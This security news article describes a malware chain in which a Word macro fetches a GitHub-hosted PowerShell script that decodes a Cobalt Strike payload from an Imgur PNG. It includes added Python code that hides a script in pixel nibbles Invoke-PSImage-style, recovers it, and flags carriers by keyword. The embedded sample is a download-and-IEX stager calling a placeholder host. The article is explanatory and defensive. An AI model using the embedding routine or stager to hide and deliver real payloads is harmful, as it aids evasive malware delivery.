A New Github-hosted Malware Strain Abuses Github And Imgur

A new malware strain has been found that uses Word documents with embedded macros to download a PowerShell script hosted on GitHub. That script in turn downloads a genuine-looking PNG image from Imgur, an image-hosting service, and decodes a Cobalt Strike payload from the image's pixel data on the victim's Windows machine. Some researchers believe the malware is linked to MuddyWater, a state-backed advanced persistent threat (APT) group that mostly targets Middle Eastern countries and was first reported in 2017.

As soon as the Word document is opened, the embedded macro runs. The macro launches powershell.exe and passes it the URL of the GitHub-hosted PowerShell script. That script is a one-liner whose only job is to download a legitimate-looking PNG image from Imgur and act on it.

The PowerShell script then reads the pixel values of the downloaded image and reconstructs the next-stage payload from them. Hiding data, code or a malicious payload inside an ordinary file such as an image is called steganography. Tools such as Invoke-PSImage make this easy: they encode a PowerShell script into the pixels of any PNG image and generate a single-line command that fetches the image, rebuilds the script from the pixel values and executes it.
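The following is an added example, not code from the article, the researchers or the Invoke-PSImage project itself. It reproduces the nibble layout Invoke-PSImage uses (the low four bits of each pixel's blue channel carry the high nibble of one script byte and the low four bits of green carry the low nibble, so the generated one-liner computes ((B -band 15) * 16) -bor (G -band 15) per pixel) with a standard-library-only PNG writer and reader, recovers the script the way the stager does, and then goes one step past the article with a triage check an analyst could run over a downloaded PNG: scan the low-nibble stream for runs of printable text and PowerShell keywords. The cover image (seeded noise standing in for a photo), the script, the keyword list and the host example.invalid are all constructed for this example.

```python
"""Added example (not the article's or Invoke-PSImage's code): hide a script in
PNG pixel nibbles the way Invoke-PSImage does, recover it the way the stager
does, and triage a PNG for such a payload. Standard library only; all inputs
below are constructed."""
import random
import struct
import zlib

W, H = 40, 40  # constructed cover size: 1600 pixels, one payload byte per pixel

# Constructed stand-in for the one-line stager; example.invalid never resolves.
SAMPLE_SCRIPT = (
    b"# constructed stand-in for the real stager, used only to demo the layout\r\n"
    b"$u = 'http://example.invalid/stage2.ps1'\r\n"
    b"$c = New-Object Net.WebClient\r\n"
    b"$s = $c.DownloadString($u)\r\n"
    b"IEX $s\r\n"
    b"Write-Output 'done'\r\n"
)
# Constructed keyword list worth flagging in a pixel-derived byte stream.
SUSPICIOUS = (b"iex", b"invoke-expression", b"downloadstring",
              b"frombase64string", b"new-object")

def _chunk(tag: bytes, data: bytes) -> bytes:
    crc = zlib.crc32(tag + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + tag + data + struct.pack(">I", crc)

def write_png(width: int, height: int, rgb: bytes) -> bytes:
    """Minimal 8-bit RGB PNG writer; every row uses filter type 0 (none)."""
    stride = width * 3
    rows = b"".join(b"\x00" + rgb[y * stride:(y + 1) * stride] for y in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return (b"\x89PNG\r\n\x1a\n" + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(rows)) + _chunk(b"IEND", b""))

def read_png(data: bytes):
    """Parse a PNG into (width, height, rgb). Supports only what write_png emits
    (8-bit RGB, filter type 0) and raises on anything else rather than mis-decoding."""
    if data[:8] != b"\x89PNG\r\n\x1a\n":
        raise ValueError("not a PNG")
    pos, idat, width, height = 8, b"", 0, 0
    while pos + 8 <= len(data):
        length = struct.unpack(">I", data[pos:pos + 4])[0]
        tag, body = data[pos + 4:pos + 8], data[pos + 8:pos + 8 + length]
        if tag == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", body[:10])
            if (depth, ctype) != (8, 2):
                raise ValueError("example handles 8-bit RGB only")
        elif tag == b"IDAT":
            idat += body
        pos += 12 + length
    stride = width * 3 + 1
    raw = zlib.decompress(idat)
    rows = [raw[y * stride:(y + 1) * stride] for y in range(height)]
    if any(r[0] != 0 for r in rows):
        raise ValueError("example handles filter type 0 only")
    return width, height, b"".join(r[1:] for r in rows)

def embed(rgb: bytes, payload: bytes) -> bytes:
    """Invoke-PSImage layout: high nibble of each byte into the low 4 bits of
    blue, low nibble into the low 4 bits of green, one payload byte per pixel."""
    if len(payload) * 3 > len(rgb):
        raise ValueError("payload needs one pixel per byte")
    px = bytearray(rgb)
    for i, b in enumerate(payload):
        g, bl = 3 * i + 1, 3 * i + 2
        px[bl] = (px[bl] & 0xF0) | (b >> 4)
        px[g] = (px[g] & 0xF0) | (b & 0x0F)
    return bytes(px)

def extract(rgb: bytes, n: int) -> bytes:
    """What the generated one-liner computes per pixel: ((B & 15) << 4) | (G & 15)."""
    return bytes(((rgb[3 * i + 2] & 15) << 4) | (rgb[3 * i + 1] & 15) for i in range(n))

def recover_script(png: bytes, length: int) -> str:
    """Stager side: the one-liner knows the script length and reads exactly that."""
    _, _, rgb = read_png(png)
    return extract(rgb, length).decode("ascii")

def triage_png(png: bytes, window: int = 64) -> dict:
    """Analyst side: the low-nibble stream of a photo looks like noise, while an
    Invoke-PSImage carrier yields runs of printable text with PowerShell keywords."""
    width, height, rgb = read_png(png)
    stream = extract(rgb, width * height)
    texty = 0
    for off in range(0, len(stream), window):
        chunk = stream[off:off + window]
        printable = sum(32 <= c < 127 or c in b"\r\n\t" for c in chunk)
        texty += printable >= 0.95 * len(chunk)
    hits = sorted(k.decode() for k in SUSPICIOUS if k in stream.lower())
    verdict = "suspicious" if texty and hits else "clean"
    return {"text_windows": texty, "keywords": hits, "verdict": verdict}

def build_images() -> tuple:
    """(clean_png, carrier_png): seeded noise standing in for a photo, and the
    same cover with SAMPLE_SCRIPT hidden in its pixel nibbles."""
    rng = random.Random(1234)
    cover = bytes(rng.randrange(256) for _ in range(W * H * 3))
    return write_png(W, H, cover), write_png(W, H, embed(cover, SAMPLE_SCRIPT))

if __name__ == "__main__":
    clean, carrier = build_images()
    print(recover_script(carrier, len(SAMPLE_SCRIPT)))
    print(triage_png(carrier), triage_png(clean))
```

Running the file shows the script round-tripping through the image, the carrier scoring "suspicious" and the same noise image without a payload scoring "clean". The keyword list is deliberately short; a production detector would also have to cope with padded or obfuscated payloads and with PNGs using other filter types and colour modes, which this reader refuses rather than mis-decodes.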

The script recovered from the PNG's pixel values is a Cobalt Strike payload. Cobalt Strike is a commercial penetration-testing toolkit that an attacker can use to open shells, run PowerShell scripts, or spawn a session that calls back to a listener from the compromised device. According to the researchers, the decoded shellcode also embeds an EICAR anti-virus test file, an apparent attempt to have security tools classify the activity as an ongoing anti-virus test rather than as a malicious payload.

The payload then uses the WinINet module to communicate with its command-and-control (C2) server and receive further instructions. The C2 domain, "Mazzion1234-44451.portmap.host", is no longer reachable, but the researchers were able to establish that it was first seen on December 20, 2020.

Abuse of legitimate services is becoming more and more common. GitHub and Imgur are not the only examples: the recently discovered wormable botnet Gitpaste-12 hosted its payloads on both GitHub and Pastebin to avoid detection while targeting routers, IP cameras, applications and more. Legitimate services such as GitHub, Discord and Imgur let cybercriminals hide their tracks with almost no investment. Experts recommend that employees be trained to recognise attacks of every kind, from phishing emails to malicious macros, and that software and patches be kept up to date. In this particular chain, blocking macros in documents received from the internet and alerting on Office applications spawning powershell.exe would interrupt the attack at its first step, before anything is fetched from GitHub or Imgur.
